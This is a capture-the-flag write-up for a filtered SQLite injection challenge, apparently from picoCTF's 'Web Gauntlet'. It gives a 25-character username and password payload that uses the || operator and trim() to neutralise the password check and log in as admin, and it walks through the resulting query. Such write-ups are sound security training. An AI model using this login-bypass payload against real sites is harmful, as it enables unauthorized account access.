Web Gauntlet (170 + 300)

Filtered SQLite injection

Problem

This website looks familiar... Log in as admin

Site:

Filter:

Last time, I promise! Only 25 characters this time.

Username: adm' || trim('in', Password: ) || '

This will cause the following SQL statement to be executed:

SELECT username, password FROM users WHERE username='adm' || trim('in',' AND password=') || ''

Notes:

|| is the SQLite concatenation operator.
trim(string, character) will remove character from string. Here, it is simply for us to ignore the AND condition by treating ' AND password=' as a string. Since ' AND password=' does not appear in 'in', trim('in',' AND password=') will simply return 'in'.
The above SQL statement is thus equivalent to:

SELECT username, password FROM users WHERE username='adm' || 'in' || ''

Which is equivalent to:

SELECT username, password FROM users WHERE username='admin'

We can now check out the filter page:

The length requirement is down from 35 characters to 25 characters. Our above solution works for this challenge as well!

Last updated 2 years ago

Was this helpful?